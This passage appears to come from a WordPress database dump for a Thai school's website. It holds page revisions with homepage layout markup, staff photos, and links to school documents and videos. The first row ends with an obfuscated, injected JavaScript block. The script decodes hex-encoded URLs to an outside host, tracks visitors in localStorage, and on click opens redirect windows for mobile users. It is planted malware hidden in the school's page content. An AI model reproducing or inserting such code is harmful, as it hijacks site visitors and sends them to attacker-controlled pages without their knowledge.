)|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script></p>','หน้าแรก','','inherit','closed','closed','','19-revision-v1','','','2025-07-15 16:10:20','2025-07-15 09:10:20','',19,'http://watprato.ssk.in.th/?p=707',0,'revision','',0),
(708,1,'2025-07-15 16:11:05','2025-07-15 09:11:05','<!-- wp:kadence/rowlayout {\"uniqueID\":\"19_fac40f-62\",\"columns\":1,\"colLayout\":\"equal\",\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"19_937c93-07\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column19_937c93-07\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"afb41c1a\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f1b9a3f2\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"41ac449a\",\"mediaId\":85,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-41ac449a\"><img class=\"gb-image gb-image-41ac449a\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/awpt.gif\" alt=\"\" title=\"awpt\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f8167df0\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":46,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/นายอนุศักดิ์-พันธ์งาม-png.png\" alt=\"\" title=\"นายอนุศักดิ์ พันธ์งาม png\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:generateblocks/image {\"uniqueId\":\"f67ede92\",\"mediaId\":406,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-f67ede92\"><img class=\"gb-image gb-image-f67ede92\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/รองผู้อำนวยการ1.jpg\" alt=\"\" title=\"รองผู้อำนวยการ1\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:group {\"fontSize\":\"small\",\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group has-small-font-size\"><!-- wp:generateblocks/container {\"uniqueId\":\"36016ef6\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"e194b6ce\",\"mediaId\":401,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-e194b6ce\"><img class=\"gb-image gb-image-e194b6ce\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/รองผู้อำนวยการ3.jpg\" alt=\"\" title=\"รองผู้อำนวยการ3\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:generateblocks/image {\"uniqueId\":\"3791db60\",\"mediaId\":404,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-3791db60\"><img class=\"gb-image gb-image-3791db60\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/รองผู้อำนวยการ2-1.jpg\" alt=\"\" title=\"รองผู้อำนวยการ2\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container --></div>\n<!-- /wp:group -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"19_67610f-d3\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns19_67610f-d3\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"19_3b4373-bb\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\\u003cbr\\u003eรองผู้อำนวยการโรงเรียน\",\"link\":\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=share_link\",\"sizePreset\":\"small\",\"background\":\"#cf2e2e\",\"backgroundHover\":\"#f78da7\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist {\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"19_d15510-f9\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items19_d15510-f9 kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"19_27c3a7-66\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_27c3a7-66\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1QO7vaeEKkhB3kDmvrrIdBi3qQkJ8oya1/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1QO7vaeEKkhB3kDmvrrIdBi3qQkJ8oya1/view?usp=sharing\">ประวัติโรงเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_c3bdf0-e8\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_c3bdf0-e8\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1j7kEi4hP1hbBIpZn7oJTgY-nHJ1PJQLs/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1j7kEi4hP1hbBIpZn7oJTgY-nHJ1PJQLs/view?usp=drive_link\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_aba00e-94\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_aba00e-94\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/180gGIRpJLJ6MXT59TBBckEoyMyJ0syro/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/180gGIRpJLJ6MXT59TBBckEoyMyJ0syro/view?usp=drive_link\">กรรมการสถานศึกษา</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_6a67b5-2d\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_6a67b5-2d\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1WayPS34cjiQafz8cVXMrSwi14axv8wNL/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1WayPS34cjiQafz8cVXMrSwi14axv8wNL/view?usp=sharing\">ข้อมูลผู้บริหาร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_735bb1-be\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_735bb1-be\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1KNY_0cfvU0tSAr568ZHSWspTl7t86-R6/view?usp=sharing\" data-type=\"page\" data-id=\"19\">ข้อมูลบุคลากร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_e25727-a3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_e25727-a3\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1aH-777mmqYYRu0vbttHBA-BPqFi1gHG0/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1aH-777mmqYYRu0vbttHBA-BPqFi1gHG0/view?usp=sharing\">ข้อมูลนักเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_d0afc7-03\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_d0afc7-03\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/186unqENq5e2LLT2RUUIKpNMW3wPkg8bA/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/186unqENq5e2LLT2RUUIKpNMW3wPkg8bA/view?usp=drive_link\">ข้อมูล O-NET</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_f03b47-42\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_f03b47-42\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://eita.ssk.in.th/eit_admin.php\" data-type=\"link\" data-id=\"http://eita.ssk.in.th/eit_admin.php\">แบบวัดการรับรู้ EIT (2</a>)</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_321a89-b1\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_321a89-b1\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><img class=\"wp-image-560\" style=\"width: 150px;\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/06/EIT_QRCode-2.png\" alt=\"\"></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_bf2eae-a8\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_bf2eae-a8\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><img class=\"wp-image-418\" style=\"width: 150px;\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/e24fdb867221495643d16cf69a56df03.jpg\" alt=\"\"></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_eaf89e-46\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_eaf89e-46\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ได้รับรางวัล \"สถานศึกษาที่มีวิธีปฏิบัติที่เป็นเลิศ\"</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_2ed102-65\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_2ed102-65\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><img class=\"wp-image-574\" style=\"width: 250px;\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/06/508745932_122233182272202781_2147005512618392889_n-1.jpg\" alt=\"\"></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/grid {\"uniqueId\":\"b3b3ab6e\",\"columns\":2,\"horizontalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"10b33923\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"1d4269e0\",\"blockVersion\":3,\"typography\":{\"textAlignMobile\":\"center\",\"fontSize\":\"22px\"},\"spacing\":{\"marginBottom\":\"10px\"}} -->\n<h2 class=\"gb-headline gb-headline-1d4269e0 gb-headline-text\"><strong>VTR กิจกรรมโรงเรียน</strong></h2>\n<!-- /wp:generateblocks/headline -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"f57e2371\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"typography\":{\"textAlign\":\"right\",\"textAlignMobile\":\"center\"},\"spacing\":{\"paddingBottomMobile\":\"10px\"}} -->\n<!-- wp:generateblocks/button {\"uniqueId\":\"48e80028\",\"hasUrl\":true,\"blockVersion\":4,\"display\":\"inline-flex\",\"typography\":{\"fontSize\":\"14px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"6px\",\"paddingRight\":\"15px\",\"paddingBottom\":\"6px\",\"paddingLeft\":\"15px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\"} -->\n<a class=\"gb-button gb-button-48e80028 gb-button-text\" href=\"https://youtube.com/channel/UCJdt2kX8LXFGPgOX_y2j7GQ?si=eaP1U0RyYCHb_urQ\"><strong>คลัง VTR  โรงเรียนทั้งหมด</strong></a>\n<!-- /wp:generateblocks/button -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n\n<!-- wp:embed {\"url\":\"https://youtu.be/C9do6YkaRVU?si=Ez42jZHElNDgGtg3\",\"type\":\"video\",\"providerNameSlug\":\"youtube\",\"responsive\":true,\"className\":\"wp-embed-aspect-16-9 wp-has-aspect-ratio\"} -->\n<figure class=\"wp-block-embed is-type-video is-provider-youtube wp-block-embed-youtube wp-embed-aspect-16-9 wp-has-aspect-ratio\"><div class=\"wp-block-embed__wrapper\">\nhttps://youtu.be/C9do6YkaRVU?si=Ez42jZHElNDgGtg3\n</div></figure>\n<!-- /wp:embed -->\n\n<!-- wp:image {\"id\":566,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/06/483858906_122214558428202781_582783627217107479_n-1-1024x726.jpg\" alt=\"\" class=\"wp-image-566\"/></figure>\n<!-- /wp:image --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"8a0e429c\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:contentviews/list1 {\"blockId\":\"0i8f2on2\",\"gridGap\":{\"md\":0},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showThumbnail\":false,\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":35},\"thumbnailHeight\":{\"md\":170},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"3\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวประชาสัมพันธ์\",\"value\":\"pr\"}],\"meta-fieldsMargin\":{\"md\":{\"top\":\"-10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"meta-fieldsPadding\":{\"md\":{\"top\":\"-10\",\"bottom\":\"-10\"}},\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titleBorderStyle\":\"none\",\"titlefSize\":{\"md\":17},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"titlePadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"titleBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"readmoreBgColor\":\"#6096b4\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"paginationMargin\":{\"md\":{\"bottom\":\"-40\",\"top\":\"-20\",\"right\":\"10\",\"left\":\"10\"}}} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:group {\"layout\":{\"type\":\"flex\",\"orientation\":\"vertical\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/container {\"uniqueId\":\"af4cbf6d\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:group {\"style\":{\"layout\":{\"selfStretch\":\"fill\",\"flexSize\":null}},\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"5869148e\",\"mediaId\":260,\"sizeSlug\":\"large\",\"alignment\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-5869148e\"><img class=\"gb-image gb-image-5869148e\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/08/O27-1024x576.jpg\" alt=\"\" title=\"O27\"/></figure>\n<!-- /wp:generateblocks/image --></div>\n<!-- /wp:group -->\n<!-- /wp:generateblocks/container --></div>\n<!-- /wp:group -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"4b6444ee\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2467bce1\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"3094a446\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingBottom\":\"\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/button {\"uniqueId\":\"e4387b97\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 